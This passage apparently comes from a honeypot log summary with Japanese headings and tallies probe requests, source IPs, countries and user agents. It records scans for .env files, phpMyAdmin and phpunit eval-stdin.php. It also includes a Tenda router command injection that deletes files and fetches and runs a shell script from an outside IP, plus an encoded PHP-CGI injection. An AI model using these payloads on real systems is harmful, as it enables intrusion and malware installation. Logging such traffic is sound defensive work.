1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php`	HTTP/1.0
5	GET	`http[:]//api[.]ipify[.]org?Z72612114222Q1`	HTTP/1.1
5	GET	`http[:]//check[.]best-proxies.ru/ip.php?Z72612114222Q1`	HTTP/1.1
4	GET	`http[:]//checkip[.]amazonaws[.]com?Z72612114222Q1`	HTTP/1.1
2	GET	`http[:]//eth0[.]me?Z72612114222Q1`	HTTP/1.1
3	GET	`http[:]//fingerprints[.]bablosoft[.]com/ip?Z72612114222Q1`	HTTP/1.1
5	GET	`http[:]//ip[.]bablosoft[.]com/?Z72612114222Q1`	HTTP/1.1
5	GET	`http[:]//v4[.]ident[.]me?Z72612114222Q1`	HTTP/1.1
1	POST	`/.env.development%20`	HTTP/1.1
1	POST	`/.env.dist`	HTTP/1.1
1	POST	`/.env.old`	HTTP/1.1
1	POST	`/.env.prod`	HTTP/1.1
1	POST	`/.env.production`	HTTP/1.1
1	POST	`/.env.project%20`	HTTP/1.1
1	POST	`/.env.save`	HTTP/1.1
1	POST	`/.env`	HTTP/1.1
1	POST	`/__tests__/test-become/.env`	HTTP/1.1
1	POST	`/admin-app/.env%20`	HTTP/1.1
1	POST	`/admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/api/.env`	HTTP/1.1
1	POST	`/api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php`	HTTP/1.1
1	POST	`/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/app/.env%20`	HTTP/1.1
1	POST	`/application/.env`	HTTP/1.1
1	POST	`/apps/.env%20`	HTTP/1.1
1	POST	`/back/.env`	HTTP/1.1
1	POST	`/cms/.env`	HTTP/1.1
1	POST	`/core/.env`	HTTP/1.1
1	POST	`/cp/.env`	HTTP/1.1
1	POST	`/development/.env%20`	HTTP/1.1
2	POST	`/docker/.env`	HTTP/1.1
1	POST	`/enviroments/.env.production`	HTTP/1.1
1	POST	`/enviroments/.env`	HTTP/1.1
1	POST	`/fedex/.env`	HTTP/1.1
1	POST	`/lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/laravel/.env%20`	HTTP/1.1
1	POST	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/live_env%20`	HTTP/1.1
1	POST	`/local/.env`	HTTP/1.1
1	POST	`/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/private/.env`	HTTP/1.1
1	POST	`/redmine/.env`	HTTP/1.1
1	POST	`/rest/.env`	HTTP/1.1
1	POST	`/script/.env`	HTTP/1.1
1	POST	`/shared/.env%20`	HTTP/1.1
1	POST	`/sources/.env`	HTTP/1.1
1	POST	`/system/.env`	HTTP/1.1
1	POST	`/vendor/phpunit/Util/PHP/eval-stdin.php%20/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	13.233.186.78	United States
18	18.171.172.29	United States
1	20.55.53.144	United States
2	20.102.245.172	United States
36	20.200.126.104	United States
8	23.21.1.4	United States
1	45.56.108.128	United States
1	45.79.172.21	United States
1	45.227.254.49	Belize
5	54.36.115.221	France
10	54.37.79.75	France
1	64.62.197.130	United States
2	83.97.73.245	Germany
1	94.156.64.79	Bulgaria
8	95.214.235.169	Ukraine
8	100.26.204.70	United States
1	104.131.144.37	United States
2	139.99.28.148	Canada
2	142.93.187.22	United States
1	146.190.108.121	United States
2	167.94.146.56	United States
2	170.64.177.80	United States
1	172.105.128.11	United States
1	178.72.71.24	Russia
3	184.105.139.68	United States
1	185.161.248.148	United Kingdom
1	185.180.143.6	Portugal
2	185.224.128.191	Netherlands
1	192.241.209.4	United States
1	198.199.95.64	United States
2	198.235.24.74	United States
2	205.210.31.30	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
30	`-`
2	`Go-http-client/1.1`
1	`Hello, World`
1	`Mozilla/5.0 (Linux; Android 7.0; Lenovo K33a42) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0`
12	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0`
36	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`SEC-SGHX210/1.0 UP.Link/6.3.1.13.0`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`-`
2		`MGLNDD_13.67.44.234_80`
2		`\x03`
20		`\x16\x03\x01`
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
25	GET	`/.env`	HTTP/1.1
1	GET	`/13.67.44.234/.env`	HTTP/1.1
1	GET	`/6tiLNaC7gpmRrVoOTzyHdenA1J6`	HTTP/1.1
2	GET	`/99vt`	HTTP/1.1
2	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Phpinfo/profiler`	HTTP/1.1
1	GET	`/Phpinfo`	HTTP/1.1
1	GET	`/Profiler`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
2	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/audio/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/.env`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104[.]168[.]5[.]4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh)`	HTTP/1.1
1	GET	`/conf/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/crm/.env`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/gate.php`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/library/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/media/system/js/core.js`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/newsite/.env`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
4	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/sites/all/libraries/mailchimp/.env`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-admin/.env`	HTTP/1.1
1	GET	`/wp-content/.env`	HTTP/1.1
1	GET	`/wp-includes/css/buttons.css`	HTTP/1.1
1	GET	`/www/.env`	HTTP/1.1
1	POST	//%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	PRI	`*`	HTTP/2.0